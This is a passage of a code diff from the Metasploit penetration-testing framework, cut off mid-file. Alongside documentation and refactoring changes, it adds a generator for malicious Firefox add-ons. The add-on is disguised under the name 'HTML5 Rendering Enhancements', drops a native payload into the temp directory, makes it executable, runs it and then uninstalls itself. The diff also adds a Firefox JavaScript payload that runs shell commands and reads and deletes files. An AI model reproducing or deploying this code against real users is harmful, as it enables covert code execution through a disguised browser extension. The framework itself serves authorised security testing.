DefaultColumnWrap = 70
#Default number of characters to indent.
DefaultIndent = 2
#
# Returns a formatted string that contains information about
# the supplied module instance.
#
# @param mod [Msf::Module] the module to dump information for.
# @param indent [String] the indentation to use.
# @return [String] formatted text output of the dump.
def self.dump_module(mod, indent = " ")
case mod.type
when MODULE_PAYLOAD
@ -37,9 +37,14 @@ class ReadableText
end
end
#
# Dumps an exploit's targets.
#
# @param mod [Msf::Exploit] the exploit module to dump targets
# for.
# @param indent [String] the indentation to use (only the length
# matters).
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_targets(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -57,9 +62,13 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps the exploit's selected target
#
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_target(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -75,9 +84,13 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps an auxiliary's actions
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -95,10 +108,14 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps the table of payloads that are compatible with the supplied
# exploit.
#
# @param exploit [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_compatible_payloads(exploit, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -116,9 +133,11 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps information about an exploit module.
#
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_exploit_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
@ -171,9 +190,11 @@ class ReadableText
end
#
# Dumps information about an auxiliary module.
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_auxiliary_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
@ -207,9 +228,11 @@ class ReadableText
return output
end
#
# Dumps information about a payload module.
#
# @param mod [Msf::Payload] the payload module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_payload_module(mod, indent = '')
# General
output = "\n"
@ -244,9 +267,11 @@ class ReadableText
return output
end
#
# Dumps information about a module, just the basics.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_basic_module(mod, indent = '')
# General
output = "\n"
@ -277,13 +302,16 @@ class ReadableText
end
#No current use
def self.dump_generic_module(mod, indent = '')
end
#
# Dumps the list of options associated with the
# supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_options(mod, indent = '')
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -309,9 +337,11 @@ class ReadableText
return tbl.to_s
end
#
# Dumps the advanced options associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_advanced_options(mod, indent = '')
output = ''
pad = indent
@ -333,9 +363,11 @@ class ReadableText
return output
end
#
# Dumps the evasion options associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_evasion_options(mod, indent = '')
output = ''
pad = indent
@ -358,6 +390,11 @@ class ReadableText
return output
end
# Dumps the references associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_references(mod, indent = '')
output = ''
@ -372,9 +409,13 @@ class ReadableText
output
end
#
# Dumps the contents of a datastore.
#
# @param name [String] displayed as the table header.
# @param ds [Msf::DataStore] the DataStore to dump.
# @param indent [Integer] the indentation size.
# @param col [Integer] the column width.
# @return [String] the formatted DataStore contents.
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent,
@ -392,9 +433,17 @@ class ReadableText
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
end
#
# Dumps the list of active sessions.
#
# @param framework [Msf::Framework] the framework to dump.
# @param opts [Hash] the options to dump with.
# @option opts :session_ids [Array] the list of sessions to dump (no
# effect).
# @option opts :verbose [Boolean] gives more information if set to
# true.
# @option opts :indent [Integer] set the indentation amount.
# @option opts :col [Integer] the column wrap width.
# @return [String] the formatted list of sessions.
def self.dump_sessions(framework, opts={})
ids = (opts[:session_ids] || framework.sessions.keys).sort
verbose = opts[:verbose] || false
@ -437,12 +486,14 @@ class ReadableText
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
end
#
# Dumps the list of running jobs.
#
# If verbose is true, also prints the payload, LPORT, URIPATH and start
# time, if they exist, for each job.
#
# @param framework [Msf::Framework] the framework.
# @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH
# and start time, if they exist, for each job.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the formatted list of running jobs.
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
columns = [ 'Id', 'Name' ]
@ -479,10 +530,13 @@ class ReadableText
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
end
#
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
# a bit to add indention
#
# @param str [String] the string to wrap.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the wrapped string.
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
return Rex::Text.wordwrap(str, indent, col)
end

3
lib/msf/core/exploit/mixins.rb
View File

@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm'
# WebApp
require 'msf/core/exploit/web'
# Firefox addons
require 'msf/core/exploit/remote/firefox_addon_generator'
require 'msf/core/exploit/remote/browser_exploit_server'

13
lib/msf/core/exploit/remote/browser_exploit_server.rb
View File

@ -92,6 +92,15 @@ module Msf
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
end
#
# Returns the absolute URL to the module's resource that points to on_request_exploit
#
# @return [String] absolute URI to the exploit page
#
def get_module_uri
"#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
end
#
# Returns the current target
#
@ -166,8 +175,10 @@ module Msf
# Special keys to ignore because the script registers this as [:activex] = true or false
next if k == :clsid or k == :method
if v.class == Regexp
if v.is_a? Regexp
bad_reqs << k if profile[k.to_sym] !~ v
elsif v.is_a? Proc
bad_reqs << k unless v.call(profile[k.to_sym])
else
bad_reqs << k if profile[k.to_sym] != v
end

197
lib/msf/core/exploit/remote/firefox_addon_generator.rb Normal file
View File

@ -0,0 +1,197 @@
# -*- coding: binary -*-
###
#
# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
# addon that will gain a session.
#
###
module Msf
module Exploit::Remote::FirefoxAddonGenerator
# for calling #generate_payload_exe
include Msf::Exploit::EXE
# Add in the supported datastore options
def initialize(info={})
super(update_info(info,
'Platform' => %w{ java linux osx solaris win },
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Universal (Javascript XPCOM Shell)',
{
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Windows x64 (Native Payload)',
{
'Platform' => 'windows',
'Arch' => ARCH_X64
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
],
[ 'Linux x64 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X64
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86
}
],
[ 'Mac OS X x64 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X64
}
]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('ADDONNAME', [ true, "The addon name.", "HTML5 Rendering Enhancements" ]),
OptBool.new('AutoUninstall', [ true,
"Automatically uninstall the addon after payload execution",
true
])
], self.class)
end
# @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
# 'application/x-xpinstall' MIME type
# @return nil if payload fails to generate
def generate_addon_xpi(cli)
if target.name =~ /Javascript/
payload_file = nil
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
payload_script = regenerate_payload(cli).encoded
else
payload_file = generate_payload_exe
return nil if payload_file.nil?
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
payload_script=%q|
var process=Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
process.init(tmp);
process.run(false,[],0);
|
if target.name != 'Windows x86 (Native Payload)'
payload_script = %q|
var chmod=Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
chmod.initWithPath("/bin/chmod");
var process=Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
process.init(chmod);
process.run(true, ["+x", tmp.path], 2);
| + payload_script
end
end
zip = Rex::Zip::Archive.new
bootstrap_script = 'function startup(data, reason) {'
xpi_guid = Rex::Text.rand_guid
if target.name !~ /Javascript/
bootstrap_script << %q|
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
|
bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
bootstrap_script << %Q|payload_name="#{payload_name}";|
bootstrap_script << %q|
file.append(xpi_guid);
file.append(payload_name);
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("TmpD", Components.interfaces.nsIFile);
tmp.append(payload_name);
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
file.copyTo(tmp.parent, tmp.leafName);
|
end
bootstrap_script << payload_script
if (datastore['AutoUninstall'])
bootstrap_script << %q|
function uninstallMe() {
try { // Fx < 4.0
Components.classes["@mozilla.org/extensions/manager;1"]
.getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
}
uninstallMe();
|
end
bootstrap_script << "}"
zip.add_file('bootstrap.js', bootstrap_script)
zip.add_file(payload_name, payload_file) unless payload_file.nil?
zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>#{xpi_guid}</em:id>
<em:name>#{datastore['ADDONNAME']}</em:name>
<em:version>1.0</em:version>
<em:bootstrap>true</em:bootstrap>
<em:unpack>true</em:unpack>
<em:targetApplication>
<Description>
<em:id>toolkit@mozilla.org</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>|)
zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="bootstrap.js"/>
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
</overlay>|)
zip
end
end
end

2
lib/msf/core/handler/bind_tcp.rb
View File

@ -166,7 +166,7 @@ module BindTcp
socks[0].extend(Rex::Socket::Tcp)
socks[1].extend(Rex::Socket::Tcp)
m = OpenSSL::Digest::Digest.new('md5')
m = OpenSSL::Digest.new('md5')
m.reset
key = m.digest(datastore["AESPassword"] || "")

119
lib/msf/core/handler/reverse_http.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/sync/ref'
require 'msf/core/handler/reverse_http/uri_checksum'
module Msf
module Handler
@ -13,6 +14,7 @@ module Handler
module ReverseHttp
include Msf::Handler
include Msf::Handler::ReverseHttp::UriChecksum
#
# Returns the string representation of the handler type
@ -29,46 +31,6 @@ module ReverseHttp
"tunnel"
end
#
# Define 8-bit checksums for matching URLs
# These are based on charset frequency
#
URI_CHECKSUM_INITW = 92
URI_CHECKSUM_INITJ = 88
URI_CHECKSUM_CONN = 98
#
# Precalculated checkums as fallback
#
URI_CHECKSUM_PRECALC = [
"Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp",
"cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt",
"E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby",
"tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563",
"0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg",
"U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E",
"KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2",
"1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ",
"HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg",
"J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1",
"k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5",
"bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I",
"YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ",
"KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC",
"CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ",
"2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5",
"Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi",
"iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP",
"eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA",
"oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL",
"dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS",
"BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t",
"7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG",
"kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM",
"aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg",
"zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"
]
#
# Use the +refname+ to determine whether this handler uses SSL or not
#
@ -83,52 +45,12 @@ module ReverseHttp
# addresses.
#
def full_uri
addrs = bind_address
local_port = bind_port
scheme = (ssl?) ? "https" : "http"
"#{scheme}://#{addrs[0]}:#{local_port}/"
"#{scheme}://#{datastore['LHOST']}:#{datastore['LPORT']}/"
end
#
# Map "random" URIs to static strings, allowing us to randomize
# the URI sent in the first request.
#
def process_uri_resource(uri_match)
# This allows 'random' strings to be used as markers for
# the INIT and CONN request types, based on a checksum
uri_strip, uri_conn = uri_match.split('_', 2)
uri_strip.sub!(/^\//, '')
uri_check = Rex::Text.checksum8(uri_strip)
# Match specific checksums and map them to static URIs
case uri_check
when URI_CHECKSUM_INITW
uri_match = "/INITM"
when URI_CHECKSUM_INITJ
uri_match = "/INITJM"
when URI_CHECKSUM_CONN
uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) )
end
uri_match
end
#
# Create a URI that matches a given checksum
#
def generate_uri_checksum(sum)
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
32.times do
uri = Rex::Text.rand_text_alphanumeric(3)
chk.sort_by {rand}.each do |x|
return(uri + x) if Rex::Text.checksum8(uri + x) == sum
end
end
# Otherwise return one of the pre-calculated strings
return URI_CHECKSUM_PRECALC[sum]
end
#
# Initializes the HTTP SSL tunneling handler.
@ -175,12 +97,18 @@ module ReverseHttp
end
local_port = bind_port
addrs = bind_address
# Determine where to bind the HTTP(S) server to
bindaddrs = ipv6 ? '::' : '0.0.0.0'
if not datastore['ReverseListenerBindAddress'].to_s.empty?
bindaddrs = datastore['ReverseListenerBindAddress']
end
# Start the HTTPS server service on this host/port
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
local_port,
addrs[0],
bindaddrs,
ssl?,
{
'Msf' => framework,
@ -202,7 +130,9 @@ module ReverseHttp
},
'VirtualDirectory' => true)
print_status("Started HTTP#{ssl? ? "S" : ""} reverse handler on #{full_uri}")
scheme = (ssl?) ? "https" : "http"
bind_url = "#{scheme}://#{bindaddrs}:#{local_port}/"
print_status("Started #{scheme.upcase} reverse handler on #{bind_url}")
end
#
@ -404,27 +334,6 @@ protected
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end
end

90
lib/msf/core/handler/reverse_http/uri_checksum.rb Normal file
View File

@ -0,0 +1,90 @@
module Msf
module Handler
module ReverseHttp
module UriChecksum
#
# Define 8-bit checksums for matching URLs
# These are based on charset frequency
#
URI_CHECKSUM_INITW = 92
URI_CHECKSUM_INITJ = 88
URI_CHECKSUM_CONN = 98
#
# Precalculated checkums as fallback
#
URI_CHECKSUM_PRECALC = [
"Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp",
"cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt",
"E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby",
"tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563",
"0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg",
"U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E",
"KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2",
"1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ",
"HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg",
"J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1",
"k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5",
"bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I",
"YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ",
"KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC",
"CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ",
"2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5",
"Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi",
"iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP",
"eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA",
"oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL",
"dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS",
"BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t",
"7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG",
"kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM",
"aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg",
"zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"
]
# Map "random" URIs to static strings, allowing us to randomize
# the URI sent in the first request.
# @param uri_match [String] The URI string to convert back to the original static value
# @return [String] The static URI value derived from the checksum
def process_uri_resource(uri_match)
# This allows 'random' strings to be used as markers for
# the INIT and CONN request types, based on a checksum
uri_strip, uri_conn = uri_match.split('_', 2)
uri_strip.sub!(/^\//, '')
uri_check = Rex::Text.checksum8(uri_strip)
# Match specific checksums and map them to static URIs
case uri_check
when URI_CHECKSUM_INITW
uri_match = "/INITM"
when URI_CHECKSUM_INITJ
uri_match = "/INITJM"
when URI_CHECKSUM_CONN
uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) )
end
uri_match
end
# Create a URI that matches a given checksum
# @param sum [Fixnum] The checksum value you are trying to create a URI for
# @return [String] The URI string that checksums to the given value
def generate_uri_checksum(sum)
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
32.times do
uri = Rex::Text.rand_text_alphanumeric(3)
chk.sort_by {rand}.each do |x|
return(uri + x) if Rex::Text.checksum8(uri + x) == sum
end
end
# Otherwise return one of the pre-calculated strings
return URI_CHECKSUM_PRECALC[sum]
end
end
end
end
end

6
lib/msf/core/handler/reverse_tcp.rb
View File

@ -172,12 +172,12 @@ module ReverseTcp
socks[0].extend(Rex::Socket::Tcp)
socks[1].extend(Rex::Socket::Tcp)
m = OpenSSL::Digest::Digest.new('md5')
m = OpenSSL::Digest.new('md5')
m.reset
key = m.digest(datastore["AESPassword"] || "")
Rex::ThreadFactory.spawn('AESEncryption', false) {
c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8')
c1 = OpenSSL::Cipher.new('aes-128-cfb8')
c1.encrypt
c1.key=key
sock.put([0].pack('N'))
@ -190,7 +190,7 @@ module ReverseTcp
sock.close()
}
Rex::ThreadFactory.spawn('AESEncryption', false) {
c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8')
c2 = OpenSSL::Cipher.new('aes-128-cfb8')
c2.decrypt
c2.key=key
iv=""

3
lib/msf/core/module.rb
View File

@ -449,6 +449,9 @@ class Module
ch = self.compat['Nop']
elsif (mod.type == MODULE_PAYLOAD)
ch = self.compat['Payload']
if self.respond_to?("target") and self.target and self.target['Payload'] and self.target['Payload']['Compat']
ch = ch.merge(self.target['Payload']['Compat'])
end
else
return true
end

8
lib/msf/core/module/platform.rb
View File

@ -516,4 +516,12 @@ class Msf::Module::Platform
Rank = 100
Alias = "nodejs"
end
#
# Firefox
#
class Firefox < Msf::Module::Platform
Rank = 100
Alias = "firefox"
end
end

1
lib/msf/core/payload.rb
View File

@ -29,6 +29,7 @@ class Payload < Msf::Module
require 'msf/core/payload/netware'
require 'msf/core/payload/java'
require 'msf/core/payload/dalvik'
require 'msf/core/payload/firefox'
##
#

191
lib/msf/core/payload/firefox.rb Normal file
View File

@ -0,0 +1,191 @@
# -*- coding: binary -*-
require 'msf/core'
require 'json'
module Msf::Payload::Firefox
# Javascript source code of setTimeout(fn, delay)
# @return [String] javascript source code that exposes the setTimeout(fn, delay) method
def set_timeout_source
%Q|
var setTimeout = function(cb, delay) {
var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
return timer;
};
|
end
# Javascript source code of readFile(path) - synchronously reads a file and returns
# its contents. The file is deleted immediately afterwards.
#
# @return [String] javascript source code that exposes the readFile(path) method
def read_file_source
%Q|
var readFile = function(path) {
try {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(path);
var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
.createInstance(Components.interfaces.nsIFileInputStream);
fileStream.init(file, 1, 0, false);
var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
.createInstance(Components.interfaces.nsIBinaryInputStream);
binaryStream.setInputStream(fileStream);
var array = binaryStream.readByteArray(fileStream.available());
binaryStream.close();
fileStream.close();
file.remove(true);
return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
} catch (e) { return ""; }
};
|
end
# Javascript source code of runCmd(str,cb) - runs a shell command on the OS
#
# Because of a limitation of firefox, we cannot retrieve the shell output
# so the stdout/err are instead redirected to a temp file, which is read and
# destroyed after the command completes.
#
# On posix, the command is double wrapped in "/bin/sh -c" calls, the outer of
# which redirects stdout.
#
# On windows, the command is wrapped in two "cmd /c" calls, the outer of which
# redirects stdout. A JScript "launch" file is dropped and invoked with wscript
# to run the command without displaying the cmd.exe prompt.
#
# When the command contains the pattern "[JAVASCRIPT] ... [/JAVASCRIPT]", the
# javascript code between the tags is eval'd and returned.
#
# @return [String] javascript source code that exposes the runCmd(str) method.
def run_cmd_source
%Q|
#{read_file_source}
#{set_timeout_source}
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
var windows = (ua.indexOf("Windows")>-1);
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
var runCmd = function(cmd, cb) {
cb = cb \|\| (function(){});
if (cmd.trim().length == 0) {
setTimeout(function(){ cb("Command is empty string ('')."); });
return;
}
var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
if (js) {
var tag = "[!JAVASCRIPT]";
var sync = true; // avoid zalgo's reach
var sent = false;
var retVal = null;
try {
retVal = Function('send', js[1])(function(r){
if (sent) return;
sent = true
if (r) {
if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
else cb(false, r+tag+"\\n");
}
});
} catch (e) { retVal = e.message; }
sync = false;
if (retVal && !sent) {
sent = true;
setTimeout(function(){ cb(false, retVal+tag+"\\n"); });
}
return;
}
var shEsc = "\\\\$&";
var shPath = "/bin/sh -c"
if (windows) {
shPath = "cmd /c";
shEsc = "\\^$&";
var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
